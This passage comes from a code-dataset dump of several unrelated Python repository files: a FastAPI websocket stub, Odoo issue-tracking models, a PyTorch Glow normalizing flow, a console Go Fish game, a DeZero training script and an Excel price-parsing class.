\"aaaaaa\")\n await websocket.send_json({\"value\":payload})\n marks.remove(payload)\n\ndef main():\n uvicorn.run(\n \"main:app\",\n host=\"0.0.0.0\",\n port=8000,\n log_level=\"debug\",\n reload=True,\n debug=True,\n )\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Danny-Dasilva/stream_control","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"28544774998","text":"from odoo import models, fields, api\n\n\nclass Issue(models.Model):\n _name = 'issue.issue'\n _description = 'An issue that needs tracked (RMAs etc)'\n _inherit = [\n 'mail.thread',\n 'mail.activity.mixin',\n ]\n\n name = fields.Char()\n description = fields.Html(string='Description')\n user_ids = fields.One2many(\n 'res.users',\n 'id',\n string='Assigned To',\n )\n category_id = fields.Many2one(\n 'issue.category',\n string='Category',\n )\n state = fields.Selection([\n ('needs action', 'Needs Action'),\n ('in progress', 'In Progress'),\n ('completed', 'Completed'),\n ],\n string='Status',\n default='needs action',\n )\n last_checked = fields.Datetime('Last Checked')\n communication_ids = fields.Many2many(\n 'issue.communication',\n 'id',\n string='External Communications',\n )\n old_id = fields.Integer()\n\n\nclass IssueCategory(models.Model):\n _name = 'issue.category'\n _description = 'Different Categories for Issues'\n\n name = fields.Char(compute='_compute_name')\n category = fields.Char(string='Category')\n color_id = fields.Many2one(\n 'issue.category.color',\n string='Color',\n )\n\n @api.depends('color_id', 'category')\n @api.multi\n def _compute_name(self):\n for category in self:\n category.name = f'{category.category} - {category.color_id.name}'\n\n\nclass IssueCategoryColor(models.Model):\n _name = 'issue.category.color'\n _description = 'Color code for Issue Categories'\n\n name = fields.Char(string='Color')\n\n\nclass IssueCommunication(models.Model):\n _name = 'issue.communication'\n _description = 'Different Places Communication about the issue happened'\n\n name = fields.Char(compute='_compute_name')\n channel_id = fields.Many2one(\n 'issue.communication.channel',\n string='Channel',\n oldname='channel',\n )\n identifier = fields.Char(string='Identifier')\n\n @api.depends('channel_id', 'identifier')\n @api.multi\n def _compute_name(self):\n for communication in self:\n communication.name = f'{communication.channel_id.name}: {communication.identifier}'\n\n\nclass IssueCommunicationChannel(models.Model):\n _name = 'issue.communication.channel'\n _description = 'Platform or Record communication happened'\n\n name = fields.Char()\n","repo_name":"Dcode-Tech/dcode_issue_tracking","sub_path":"models/issue.py","file_name":"issue.py","file_ext":"py","file_size_in_byte":2412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26931011712","text":"\"\"\"Implementation taken from https://github.com/kamenbliznashki/normalizing_flows and modified slightly.\"\"\"\nimport math\n\nimport torch\nimport torch.nn as nn\nimport torch.distributions as D\nimport torch.nn.functional as F\nfrom torch.utils.checkpoint import checkpoint\n\nfrom fastmri.models.unet import Unet\n\n\nclass Glow(nn.Module):\n \"\"\" Glow multi-scale architecture with depth of flow K and number of levels L; cf Glow figure 2; section 3\"\"\"\n\n def __init__(self, width, depth, n_levels, input_dims=(3, 32, 32), affine_scale_low=0., unet_coupling=False, try_to_center=False, checkpoint_grads=False):\n super().__init__()\n # calculate output dims\n in_channels, H, W = input_dims\n out_channels = int(in_channels * 4**(n_levels+1) / 2**n_levels) # each Squeeze results in 4x in_channels (cf RealNVP section 3.6); each Split in 1/2 x in_channels\n out_HW = int(H / 2**(n_levels+1)) # each Squeeze is 1/2 x HW dim (cf RealNVP section 3.6)\n self.output_dims = out_channels, out_HW, out_HW\n\n # preprocess images\n self.preprocess = Preprocess(try_to_center)\n\n # network layers cf Glow figure 2b: (Squeeze -> FlowStep x depth -> Split) x n_levels -> Squeeze -> FlowStep x depth\n self.flowlevels = nn.ModuleList([FlowLevel(in_channels * 2**i, width, depth, affine_scale_low, unet_coupling, checkpoint_grads) for i in range(n_levels)])\n self.squeeze = Squeeze()\n self.flowstep = FlowSequential(*[FlowStep(out_channels, width, affine_scale_low, unet_coupling) for _ in range(depth)], checkpoint_grads=checkpoint_grads)\n\n # gaussianize the final z output; initialize to identity\n self.gaussianize = Gaussianize(out_channels)\n\n # base distribution of the flow\n self.register_buffer('base_dist_mean', torch.zeros(1))\n self.register_buffer('base_dist_var', torch.ones(1))\n\n def forward(self, x):\n x, sum_logdets = self.preprocess(x)\n # pass through flow\n zs = []\n for m in self.flowlevels:\n x, z, logdet = m(x)\n sum_logdets = sum_logdets + logdet\n zs.append(z)\n x = self.squeeze(x)\n z, logdet = self.flowstep(x)\n sum_logdets = sum_logdets + logdet\n\n # gaussianize the final z\n z, logdet = self.gaussianize(torch.zeros_like(z), z)\n sum_logdets = sum_logdets + logdet\n zs.append(z)\n return zs, sum_logdets\n\n def inverse(self, zs=None, batch_size=None, z_std=1.):\n if zs is None: # if no random numbers are passed, generate new from the base distribution\n assert batch_size is not None, 'Must either specify batch_size or pass a batch of z random numbers.'\n zs = [z_std * self.base_dist.sample((batch_size, *self.output_dims)).squeeze()]\n # pass through inverse flow\n z, sum_logdets = self.gaussianize.inverse(torch.zeros_like(zs[-1]), zs[-1])\n x, logdet = self.flowstep.inverse(z)\n sum_logdets = sum_logdets + logdet\n x = self.squeeze.inverse(x)\n for i, m in enumerate(reversed(self.flowlevels)): # type: ignore\n z = z_std * (self.base_dist.sample(x.shape).squeeze() if len(zs) == 1 else zs[-i-2]) # if no z's are passed, generate new random numbers from the base dist\n x, logdet = m.inverse(x, z)\n sum_logdets = sum_logdets + logdet\n # postprocess\n x, logdet = self.preprocess.inverse(x)\n sum_logdets = sum_logdets + logdet\n return x, sum_logdets\n\n @property\n def base_dist(self):\n return D.Normal(self.base_dist_mean, self.base_dist_var)\n\n def log_prob(self, x, bits_per_pixel=False):\n zs, logdet = self.forward(x)\n return self.log_prob_latent(zs, logdet, bits_per_pixel)\n\n def log_prob_latent(self, zs, logdet, bits_per_pixel=False):\n log_prob = sum(self.base_dist.log_prob(z).sum([1, 2, 3]) for z in zs) + logdet\n if bits_per_pixel:\n num_pixels = sum(z[0].numel() for z in zs)\n log_prob /= (math.log(2) * num_pixels)\n return log_prob\n\n\nclass FlowLevel(nn.Module):\n \"\"\" One depth level of Glow flow (Squeeze -> FlowStep x K -> Split); cf Glow figure 2b \"\"\"\n\n def __init__(self, n_channels, width, depth, affine_scale_low, unet_coupling, checkpoint_grads=False):\n super().__init__()\n # network layers\n self.squeeze = Squeeze()\n self.flowsteps = FlowSequential(*[FlowStep(4*n_channels, width, affine_scale_low, unet_coupling) for _ in range(depth)], checkpoint_grads=checkpoint_grads)\n self.split = Split(4*n_channels)\n\n def forward(self, x):\n x = self.squeeze(x)\n x, logdet_flowsteps = self.flowsteps(x)\n x1, z2, logdet_split = self.split(x)\n logdet = logdet_flowsteps + logdet_split\n return x1, z2, logdet\n\n def inverse(self, x1, z2):\n x, logdet_split = self.split.inverse(x1, z2)\n x, logdet_flowsteps = self.flowsteps.inverse(x)\n x = self.squeeze.inverse(x)\n logdet = logdet_flowsteps + logdet_split\n return x, logdet\n\n\nclass FlowSequential(nn.Sequential):\n \"\"\" Container for layers of a normalizing flow \"\"\"\n\n def __init__(self, *args, **kwargs):\n self.checkpoint_grads = kwargs.pop('checkpoint_grads', None)\n super().__init__(*args, **kwargs)\n\n def forward(self, x):\n sum_logdets = 0.\n for module in self:\n x, logdet = module(x) if not self.checkpoint_grads else checkpoint(module, x)\n sum_logdets = sum_logdets + logdet\n return x, sum_logdets\n\n def inverse(self, z):\n sum_logdets = 0.\n for module in reversed(self): # type: ignore\n z, logdet = module.inverse(z)\n sum_logdets = sum_logdets + logdet\n return z, sum_logdets\n\n\nclass FlowStep(FlowSequential):\n \"\"\" One step of Glow flow (Actnorm -> Invertible 1x1 conv -> Affine coupling); cf Glow Figure 2a \"\"\"\n\n def __init__(self, n_channels, width, affine_scale_low, unet_coupling):\n super().__init__(Actnorm(param_dim=(1, n_channels, 1, 1)),\n Invertible1x1Conv(n_channels),\n AffineCoupling(n_channels, width, affine_scale_low, unet_coupling))\n\n\nclass Actnorm(nn.Module):\n \"\"\" Actnorm layer; cf Glow section 3.1 \"\"\"\n\n def __init__(self, param_dim=(1, 3, 1, 1)):\n super().__init__()\n self.scale = nn.Parameter(torch.ones(param_dim))\n self.bias = nn.Parameter(torch.zeros(param_dim))\n self.register_buffer('initialized', torch.tensor(0).byte())\n\n def forward(self, x):\n if not self.initialized:\n # per channel mean and variance where x.shape = (B, C, H, W)\n self.bias.squeeze().data.copy_(x.transpose(0, 1).flatten(1).mean(1)).view_as(self.scale)\n self.scale.squeeze().data.copy_(x.transpose(0, 1).flatten(1).std(1, False) + 1e-6).view_as(self.bias)\n self.initialized += 1\n\n z = (x - self.bias) / self.scale\n logdet = - self.scale.abs().log().sum() * x.shape[2] * x.shape[3]\n return z, logdet\n\n def inverse(self, z):\n return z * self.scale + self.bias, self.scale.abs().log().sum() * z.shape[2] * z.shape[3]\n\n\nclass Invertible1x1Conv(nn.Module):\n \"\"\" Invertible 1x1 convolution layer; cf Glow section 3.2 \"\"\"\n\n def __init__(self, n_channels=3):\n super().__init__()\n\n # initialize a 1x1 convolution weight matrix\n w = torch.randn(n_channels, n_channels)\n w = torch.qr(w)[0] # note: nn.init.orthogonal_ returns orth matrices with dets +/- 1 which complicates the inverse call below\n self.w = nn.Parameter(w)\n\n def forward(self, x):\n B, C, H, W = x.shape\n logdet = torch.slogdet(self.w.unsqueeze(0))[-1].squeeze(0) * H * W # add and remove batch dim to avoid slogdet performance bug\n return F.conv2d(x, self.w.view(C, C, 1, 1)), logdet\n\n def inverse(self, z):\n B, C, H, W = z.shape\n w_inv = self.w.inverse()\n logdet = - torch.slogdet(self.w.unsqueeze(0))[-1].squeeze(0) * H * W\n return F.conv2d(z, w_inv.view(C, C, 1, 1)), logdet\n\n\nclass AffineCoupling(nn.Module):\n \"\"\" Affine coupling layer; cf Glow section 3.3; RealNVP figure 2 \"\"\"\n\n def __init__(self, n_channels, width, affine_scale_low, unet_coupling):\n super().__init__()\n\n self.affine_scale_low = affine_scale_low\n\n # network layers;\n # per realnvp, network splits input, operates on half of it, and returns shift and scale of dim = half the input channels\n if unet_coupling:\n self.unet = Unet(in_chans=n_channels//2, out_chans=n_channels, num_pool_layers=2)\n self.conv3 = nn.Conv2d(n_channels, n_channels, kernel_size=1)\n else:\n self.unet = None\n self.conv1 = nn.Conv2d(n_channels//2, width, kernel_size=3, padding=1, bias=False) # input is split along channel dim\n self.actnorm1 = Actnorm(param_dim=(1, width, 1, 1))\n self.conv2 = nn.Conv2d(width, width, kernel_size=1, padding=1, bias=False)\n self.actnorm2 = Actnorm(param_dim=(1, width, 1, 1))\n self.conv3 = nn.Conv2d(width, n_channels, kernel_size=3) # output is split into scale and shift components\n self.log_scale_factor = nn.Parameter(torch.zeros(n_channels, 1, 1)) # learned scale (cf RealNVP sec 4.1 / Glow official code\n\n # initialize last convolution with zeros, such that each affine coupling layer performs an identity function\n self.conv3.weight.data.zero_()\n self.conv3.bias.data.zero_()\n\n def forward(self, x):\n x_a, x_b = x.chunk(2, 1) # split along channel dim\n s, t = self.NN(x_b)\n z_a = s * x_a + t\n z_b = x_b\n z = torch.cat([z_a, z_b], dim=1) # concat along channel dim\n\n logdet = s.log().sum([1, 2, 3])\n return z, logdet\n\n def inverse(self, z):\n z_a, z_b = z.chunk(2, 1) # split along channel dim\n s, t = self.NN(z_b)\n x_a = (z_a - t) / s\n x_b = z_b\n x = torch.cat([x_a, x_b], dim=1) # concat along channel dim\n\n logdet = - s.log().sum([1, 2, 3])\n return x, logdet\n\n def NN(self, chunk_b):\n if self.unet:\n h = self.unet(chunk_b)\n else:\n h = F.relu(self.actnorm1(self.conv1(chunk_b))[0])\n h = F.relu(self.actnorm2(self.conv2(h))[0])\n\n h = self.conv3(h) * self.log_scale_factor.exp()\n t = h[:,0::2,:,:] # shift; take even channels\n s = h[:,1::2,:,:] # scale; take odd channels\n s = self.affine_scale_low + (1 - self.affine_scale_low) * torch.sigmoid(s + 2.) # at initialization, s is 0 and sigmoid(2) is near identity\n return s, t\n\n\nclass Squeeze(nn.Module):\n \"\"\" RealNVP squeezing operation layer (cf RealNVP section 3.6; Glow figure 2b):\n For each channel, it divides the image into subsquares of shape 2 × 2 × c, then reshapes them into subsquares of\n shape 1 × 1 × 4c. The squeezing operation transforms an s × s × c tensor into an s/2 × s/2 × 4c tensor \"\"\"\n\n def __init__(self):\n super().__init__()\n\n def forward(self, x):\n B, C, H, W = x.shape\n x = x.reshape(B, C, H//2, 2, W//2, 2) # factor spatial dim\n x = x.permute(0, 1, 3, 5, 2, 4) # transpose to (B, C, 2, 2, H//2, W//2)\n x = x.reshape(B, 4*C, H//2, W//2) # aggregate spatial dim factors into channels\n return x\n\n def inverse(self, x):\n B, C, H, W = x.shape\n x = x.reshape(B, C//4, 2, 2, H, W) # factor channel dim\n x = x.permute(0, 1, 4, 2, 5, 3) # transpose to (B, C//4, H, 2, W, 2)\n x = x.reshape(B, C//4, 2*H, 2*W) # aggregate channel dim factors into spatial dims\n return x\n\n\nclass Split(nn.Module):\n \"\"\" Split layer; cf Glow figure 2 / RealNVP figure 4b\n Based on RealNVP multi-scale architecture: splits an input in half along the channel dim; half the vars are\n directly modeled as Gaussians while the other half undergo further transformations (cf RealNVP figure 4b).\n \"\"\"\n\n def __init__(self, n_channels):\n super().__init__()\n self.gaussianize = Gaussianize(n_channels//2)\n\n def forward(self, x):\n x1, x2 = x.chunk(2, dim=1) # split input along channel dim\n z2, logdet = self.gaussianize(x1, x2)\n return x1, z2, logdet\n\n def inverse(self, x1, z2):\n x2, logdet = self.gaussianize.inverse(x1, z2)\n x = torch.cat([x1, x2], dim=1) # cat along channel dim\n return x, logdet\n\n\nclass Gaussianize(nn.Module):\n \"\"\" Gaussianization per RealNVP sec 3.6 / fig 4b -- at each step half the variables are directly modeled as Gaussians.\n Model as Gaussians:\n x2 = z2 * exp(logs) + mu, so x2 ~ N(mu, exp(logs)^2) where mu, logs = f(x1)\n then to recover the random numbers z driving the model:\n z2 = (x2 - mu) * exp(-logs)\n Here f(x1) is a conv layer initialized to identity.\n \"\"\"\n\n def __init__(self, n_channels):\n super().__init__()\n self.net = nn.Conv2d(n_channels, 2*n_channels, kernel_size=3, padding=1) # computes the parameters of Gaussian\n self.log_scale_factor = nn.Parameter(torch.zeros(2*n_channels, 1, 1)) # learned scale (cf RealNVP sec 4.1 / Glow official code\n # initialize to identity\n self.net.weight.data.zero_()\n self.net.bias.data.zero_()\n\n def forward(self, x1, x2):\n h = self.net(x1) * self.log_scale_factor.exp() # use x1 to model x2 as Gaussians; learnable scale\n m, logs = h[:,0::2,:,:], h[:,1::2,:,:] # split along channel dims\n z2 = (x2 - m) * torch.exp(-logs) # center and scale; log prob is computed at the model forward\n logdet = - logs.sum([1, 2, 3])\n return z2, logdet\n\n def inverse(self, x1, z2):\n h = self.net(x1) * self.log_scale_factor.exp()\n m, logs = h[:,0::2,:,:], h[:,1::2,:,:]\n x2 = m + z2 * torch.exp(logs)\n logdet = logs.sum([1, 2, 3])\n return x2, logdet\n\n\nclass Preprocess(nn.Module):\n def __init__(self, try_to_center):\n super().__init__()\n self.try_to_center = try_to_center\n\n def forward(self, x):\n logdet = - math.log(256) * x[0].numel() # processing each image dim from [0, 255] to [0,1]; per RealNVP sec 4.1 taken into account\n if self.try_to_center:\n x = x - 0.5\n return x, logdet\n\n def inverse(self, x):\n logdet = math.log(256) * x[0].numel()\n if self.try_to_center:\n x = x + 0.5\n return x, logdet\n","repo_name":"ffraaz/flow_based_priors","sub_path":"kernprior/glow.py","file_name":"glow.py","file_ext":"py","file_size_in_byte":14622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32192694690","text":"import random\n\ndeck=[\"Ace of Spades\",\"2 of Spades\",\"3 of Spades\",\"4 of Spades\",\"5 of Spades\",\"6 of Spades\",\"7 of Spades\",\"8 of Spades\",\"9 of Spades\",\"10 of Spades\",\"Jack of Spades\",\"Queen of Spades\",\"King of Spades\",\"Ace of Diamonds\",\"2 of Diamonds\",\"3 of Diamonds\",\"4 of Diamonds\",\"5 of Diamonds\",\"6 of Diamonds\",\"7 of Diamonds\",\"8 of Diamonds\",\"9 of Diamonds\",\"10 of Diamonds\",\"Jack of Diamonds\",\"Queen of Diamonds\",\"King of Diamonds\", \"Ace of Clubs\",\"2 of Clubs\",\"3 of Clubs\",\"4 of Clubs\",\"5 of Clubs\",\"6 of Clubs\",\"7 of Clubs\",\"8 of Clubs\",\"9 of Clubs\",\"10 of Clubs\",\"Jack of Clubs\",\"Queen of Clubs\",\"King of Clubs\",\"Ace of Hearts\",\"2 of Hearts\",\"3 of Hearts\",\"4 of Hearts\",\"5 of Hearts\",\"6 of Hearts\",\"7 of Hearts\",\"8 of Hearts\",\"9 of Hearts\",\"10 of Hearts\",\"Jack of Hearts\",\"Queen of Hearts\",\"King of Hearts\"]\nrandom.shuffle(deck)\n\nwinner=1\nplayer = 1\np1hand = []\np2hand = []\np1wins= 0\np2wins= 0 \n\n\ndef give_hand():\n for num in range (0,7):\n p1hand.append(deck[num])\n for num in range (7,14):\n p2hand.append(deck[num])\n for elem in range (0,15):\n deck.pop(0)\n elem=elem+1\n print(\"Player 1 please write down your hand: \" + str(p1hand))\n ready=input(\"Ready to see your hand Player 2? \")\n if ready==\"yes\":\n print(\"Player 2 please write down your hand: \" + str(p2hand))\n\ndef go_fish():\n go_fish = 0\n if player==1:\n if (card + \" of Spades\") in p2hand:\n print(\"Player 1 has taken the card \" + card + \" of Spades\")\n p1hand.append(card + \" of Spades\")\n p2hand.remove(card + \" of Spades\")\n go_fish=go_fish + 1\n if (card + \" of Hearts\") in p2hand:\n print(\"Player 1 has taken the card \" + card + \" of Hearts\")\n p1hand.append(card + \" of Hearts\")\n p2hand.remove(card + \" of Hearts\")\n go_fish=go_fish + 1\n if (card + \" of Clubs\") in p2hand:\n print(\"Player 1 has taken the card \" + card + \" of Clubs\")\n p1hand.append(card + \" of Clubs\")\n p2hand.remove(card + \" of Clubs\")\n go_fish=go_fish + 1\n if (card + \" of Diamonds\") in p2hand:\n print(\"Player 1 has taken the card \" + card + \" of Diamonds\")\n p1hand.append(card + \" of Diamonds\")\n p2hand.remove(card + \" of Diamonds\")\n go_fish=go_fish + 1\n if go_fish==0:\n print(\"Go Fish!\")\n draw_card()\n\n if player==2:\n if (card + \" of Spades\") in p1hand:\n print(\"Player 2 has taken the card \" + card + \" of Spades\")\n p2hand.append(card + \" of Spades\")\n p1hand.remove(card + \" of Spades\")\n go_fish=go_fish + 1\n if (card + \" of Hearts\") in p1hand:\n print(\"Player 2 has taken the card \" + card + \" of Hearts\")\n p2hand.append(card + \" of Hearts\")\n p1hand.remove(card + \" of Hearts\")\n go_fish=go_fish + 1\n if (card + \" of Clubs\") in p1hand:\n print(\"Player 2 has taken the card \" + card + \" of Clubs\")\n p2hand.append(card + \" of Clubs\")\n p1hand.remove(card + \" of Clubs\")\n go_fish=go_fish + 1\n if (card + \" of Diamonds\") in p1hand:\n print(\"Player 2 has taken the card \" + card + \" of Diamonds\")\n p2hand.append(card + \" of Diamonds\")\n p1hand.remove(card + \" of Diamonds\")\n go_fish=go_fish + 1\n if go_fish==0:\n print(\"Go Fish!\")\n draw_card()\n \ndef draw_card():\n if player==1:\n p1hand.append(deck[0])\n deck.pop(0)\n print(\"New Hand: \" + str(p1hand))\n if player==2:\n p2hand.append(deck[0])\n deck.pop(0)\n print(\"New Hand \" + str(p2hand))\n\ndef draw_set():\n if player==1:\n for num in range (0,3):\n p1hand.append(deck[num])\n for elem in range (0,5):\n deck.pop(0)\n elem = elem +1\n print(\"New Hand:\" + str(p1hand))\n if player==2:\n for num in range (0,3):\n p1hand.append(deck[num])\n for elem in range (0,3):\n deck.pop(0)\n elem = elem +1\n print(\"New Hand: \" + str(p2hand))\n\ndef check_sets():\n if player==1:\n global p1wins\n for num in range (11):\n if (str(num) + \" of Spades\" in p1hand) and (str(num) + \" of Hearts\" in p1hand) and (str(num) + \" of Diamonds\" in p1hand) and (str(num) + \" of Clubs\" in p1hand):\n p1wins = p1wins + 1\n p1hand.remove(str(num) + \" of Spades\")\n p1hand.remove(str(num) + \" of Hearts\")\n p1hand.remove(str(num) + \" of Diamonds\")\n p1hand.remove(str(num) + \" of Clubs\")\n draw_set()\n if (\"Ace of Spades\" in p1hand) and (\"Ace of Hearts\" in p1hand) and (\"Ace of Diamonds\" in p1hand) and (\"Ace of Clubs\" in p1hand):\n p1wins = p1wins + 1\n p1hand.remove(\"Ace of Spades\")\n p1hand.remove(\"Ace of Hearts\")\n p1hand.remove(\"Ace of Diamonds\")\n p1hand.remove(\"Ace of Clubs\")\n draw_set()\n if (\"Jack of Spades\" in p1hand) and (\"Jack of Hearts\" in p1hand) and (\"Jack of Diamonds\" in p1hand) and (\"Jack of Clubs\" in p1hand):\n p1wins = p1wins + 1\n p1hand.remove(\"Jack of Spades\")\n p1hand.remove(\"Jack of Hearts\")\n p1hand.remove(\"Jack of Diamonds\")\n p1hand.remove(\"Jack of Clubs\")\n draw_set()\n if (\"Queen of Spades\" in p1hand) and (\"Queen of Hearts\" in p1hand) and (\"Queen of Diamonds\" in p1hand) and (\"Queen of Clubs\" in p1hand):\n p1wins = p1wins + 1\n p1hand.remove(\"Queen of Spades\")\n p1hand.remove(\"Queen of Hearts\")\n p1hand.remove(\"Queen of Diamonds\")\n p1hand.remove(\"Queen of Clubs\")\n draw_set()\n if (\"King of Spades\" in p1hand) and (\"King of Hearts\" in p1hand) and (\"King of Diamonds\" in p1hand) and (\"King of Clubs\" in p1hand):\n p1wins = p1wins + 1\n p1hand.remove(\"King of Spades\")\n p1hand.remove(\"King of Hearts\")\n p1hand.remove(\"King of Diamonds\")\n p1hand.remove(\"King of Clubs\")\n draw_set()\n if player==2:\n global p2wins\n for num in range (11):\n if (str(num) + \" of Spades\" in p2hand) and (str(num) + \" of Hearts\" in p2hand) and (str(num) + \" of Diamonds\" in p2hand) and (str(num) + \" of Clubs\" in p2hand):\n p2wins = p2wins + 1\n p2hand.remove(str(num) + \" of Spades\")\n p2hand.remove(str(num) + \" of Hearts\")\n p2hand.remove(str(num) + \" of Diamonds\")\n p2hand.remove(str(num) + \" of Clubs\")\n draw_set()\n if (\"Ace of Spades\" in p2hand) and (\"Ace of Hearts\" in p2hand) and (\"Ace of Diamonds\" in p2hand) and (\"Ace of Clubs\" in p2hand):\n p2wins = p2wins + 1\n p2hand.remove(\"Ace of Spades\")\n p2hand.remove(\"Ace of Hearts\")\n p2hand.remove(\"Ace of Diamonds\")\n p2hand.remove(\"Ace of Clubs\")\n draw_set()\n if (\"Jack of Spades\" in p2hand) and (\"Jack of Hearts\" in p2hand) and (\"Jack of Diamonds\" in p2hand) and (\"Jack of Clubs\" in p2hand):\n p2wins = p2wins + 1\n p2hand.remove(\"Jack of Spades\")\n p2hand.remove(\"Jack of Hearts\")\n p2hand.remove(\"Jack of Diamonds\")\n p2hand.remove(\"Jack of Clubs\")\n draw_set()\n if (\"Queen of Spades\" in p2hand) and (\"Queen of Hearts\" in p2hand) and (\"Queen of Diamonds\" in p2hand) and (\"Queen of Clubs\" in p2hand):\n p2wins = p2wins + 1\n p2hand.remove(\"Queen of Spades\")\n p2hand.remove(\"Queen of Hearts\")\n p2hand.remove(\"Queen of Diamonds\")\n p2hand.remove(\"Queen of Clubs\")\n draw_set()\n if (\"King of Spades\" in p2hand) and (\"King of Hearts\" in p2hand) and (\"King of Diamonds\" in p2hand) and (\"King of Clubs\" in p2hand):\n p2wins = p2wins + 1\n p2hand.remove(\"King of Spades\")\n p2hand.remove(\"King of Hearts\")\n p2hand.remove(\"King of Diamonds\")\n p2hand.remove(\"King of Clubs\")\n draw_set()\n\ndef check_winner():\n if p1wins > 5:\n return \"1\"\n if p2wins > 5:\n return \"2\"\n\nplay = input(\"Would you like to play Go Fish? \")\nif (play == \"yes\"):\n give_hand()\nwhile check_winner() is None:\n card=input(\"Player \" + str(player) + \" what card would you like to fish for? \")\n go_fish()\n check_sets()\n check_winner()\n if player==1:\n player=2\n else:\n player=1\nprint(\"Player \" + check_winner() + \" wins!\")\n \n \n","repo_name":"sfrancis21/Go-Fish-2020","sub_path":"GoFish.py","file_name":"GoFish.py","file_ext":"py","file_size_in_byte":7921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74072234402","text":"import numpy as np\nif '__file__' in globals():\n import os\n import sys\n sys.path.append(os.path.join(os.path.dirname(__file__), '..'))\nfrom dezero import Variable\nfrom dezero.utils import plot_dot_graph\nimport dezero.functions as F\n\n# toy dataset\nnp.random.seed(0)\nx = np.random.rand(100, 1)\ny = np.sin(2 * np.pi * x) + np.random.rand(100, 1)\n\n# 1. initialization of weights\nI, H, O = 1, 10, 1\nW1 = Variable(0.01 * np.random.rand(I, H))\nb1 = Variable(np.zeros(H))\nW2 = Variable(0.01 * np.random.rand(H, O))\nb2 = Variable(np.zeros(O))\n\n# 2. prediction of neural networks\n\n\ndef predict(x):\n y = F.linear_simple(x, W1, b1)\n y = F.sigmoid_simple(y)\n y = F.linear_simple(y, W2, b2)\n return y\n\n\nlr = 0.2\niters = 10000\n\n# 3. training of neural networks\nfor i in range(iters):\n y_pred = predict(x)\n loss = F.mean_squared_error(y, y_pred)\n\n W1.cleargrad()\n b1.cleargrad()\n W2.cleargrad()\n b2.cleargrad()\n loss.backward()\n\n W1.data -= lr * W1.grad.data\n b1.data -= lr * b1.grad.data\n W2.data -= lr * W2.grad.data\n b2.data -= lr * b2.grad.data\n if i % 1000 == 0:\n print(loss)\n","repo_name":"dkasuga/dezero_framework","sub_path":"steps/step43.py","file_name":"step43.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"23443319114","text":"# ----------------\n# version 0.6 для мвидео\n# ________________\nimport openpyxl\nfrom openpyxl import Workbook\nfrom settings import *\nimport datetime\nimport logical as lgp\n\n\nclass ParserFile:\n def __init__(self, path_to_open, path_to_save, db, mg, db_shop):\n self.mg = mg\n self.database = db\n self.path_to_open = path_to_open\n self.path_to_save = path_to_save\n\n self.price_db = {}\n # self.price_db_exit = {'Наименование': [], 'Цена': []}\n self.price_dict_exit = {}\n self.dict_price_entrance = {}\n\n self.db_new_price = {}\n self.db_update_price = {}\n self.db_shop = db_shop\n\n def open_file(self, file=None):\n \"\"\"\n Открываем файл\n вход артикул, цена, цена2, скидка, скидка2\n \"\"\"\n if file is None:\n file = self.path_to_open\n print('-- Открываем файл')\n wb = openpyxl.load_workbook(file) # открываем файл\n sheet = wb.active # Выбираем активный лист\n rows = sheet.max_row + 1 # cols = self.sheet.max_column\n cols = sheet.max_column + 1\n\n for row in range(1, rows):\n name = sheet.cell(row=row, column=1).value\n self.dict_price_entrance[name] = []\n for col in range(2, cols):\n self.dict_price_entrance[name].append(sheet.cell(row=row, column=col).value)\n\n def file_processing(self):\n \"\"\"\n Подготовака даннх к обработке\n \"\"\"\n print('-- Обрабатываем файл')\n if self.mg == 'mts.xlsx':\n self.price_dict_exit = lgp.logical_price_processing_mts(self.dict_price_entrance)\n elif self.mg == 'dns.xlsx':\n self.price_dict_exit = lgp.logical_price_processing_dns(self.dict_price_entrance)\n elif self.mg == 'mvideo1.xlsx':\n self.price_dict_exit = lgp.logical_price_processing_mvm(self.dict_price_entrance)\n\n self.price_dict_entrance = None\n\n def unloading_from_the_database(self):\n \"\"\"\n Выгружаем данные из базы даннхы\n \"\"\"\n print('-- Выгружаю данные из базы')\n with self.database.db:\n for data in self.db_shop.select():\n d = data\n self.price_db[d.name] = [d.price_old, d.price_new, d.date_recording, d.display]\n\n def find_in_the_database(self):\n \"\"\"\n Ищем позицию в базе, если находим - проверяем было ли\n изменнеие в цене. Если позиция не найдена то сохраняем\n в словарь для дальнейшей записи.\n \"\"\"\n db_p = self.price_db\n for key, value in self.price_dict_exit.items():\n price_new = int(value)\n if db_p.get(key):\n price_old = int(db_p[key][0])\n if price_old > price_new:\n self.db_update_price[key] = price_new\n else:\n self.db_new_price[key] = price_new\n\n def import_db(self):\n for name, price in self.dict_price_entrance.items():\n self.db_new_price[name] = price[0]\n\n def writing_database_price(self):\n \"\"\"\n Сохранение новых данных в базу\n \"\"\"\n if len(self.db_new_price.items()):\n print('-- Сохраняем новые данные в базу данных')\n dt_now = datetime.datetime.now()\n data = []\n for name, price in self.db_new_price.items():\n data.append(\n {'name': name, 'price_old': price, 'price_new': 0, 'date_recording': dt_now, 'display': 0, })\n\n with self.database.db.atomic():\n self.db_shop.insert_many(data).execute()\n\n def updating_database_price(self):\n \"\"\"\n Запись обработанных данных в базу. Обнавление цены\n \"\"\"\n if len(self.db_update_price):\n print('-- Обнавления данных')\n local_dict, local_list = {}, []\n for obj in self.database.PriceParser.select():\n local_dict[obj.name] = obj\n\n for name, price in self.db_update_price.items():\n local_dict[name].price_new = price\n local_dict[name].date_recording = datetime.datetime.now()\n local_list.append(local_dict[name])\n\n obj = self.database.PriceParser\n obj.bulk_update(local_list, fields=['price_new', 'date_recording'])\n\n def writing_file_excel(self):\n \"\"\"\n Сохраняем данные в формате excel(вместо базы данных)\n \"\"\"\n print('-- Сохраняем файл')\n wb = Workbook()\n ws = wb.active\n\n stop_for = len(self.price_dict_exit['Наименование'])\n for i in range(0, stop_for):\n ws.cell(row=i + 1, column=1, value=self.price_dict_exit['Наименование'][i])\n ws.cell(row=i + 1, column=2, value=self.price_dict_exit['Цена'][i])\n\n wb.save(filename=self.path_to_save)\n\n def writing_file_excel_db(self, path_to_save='database_excel.xlsx'):\n 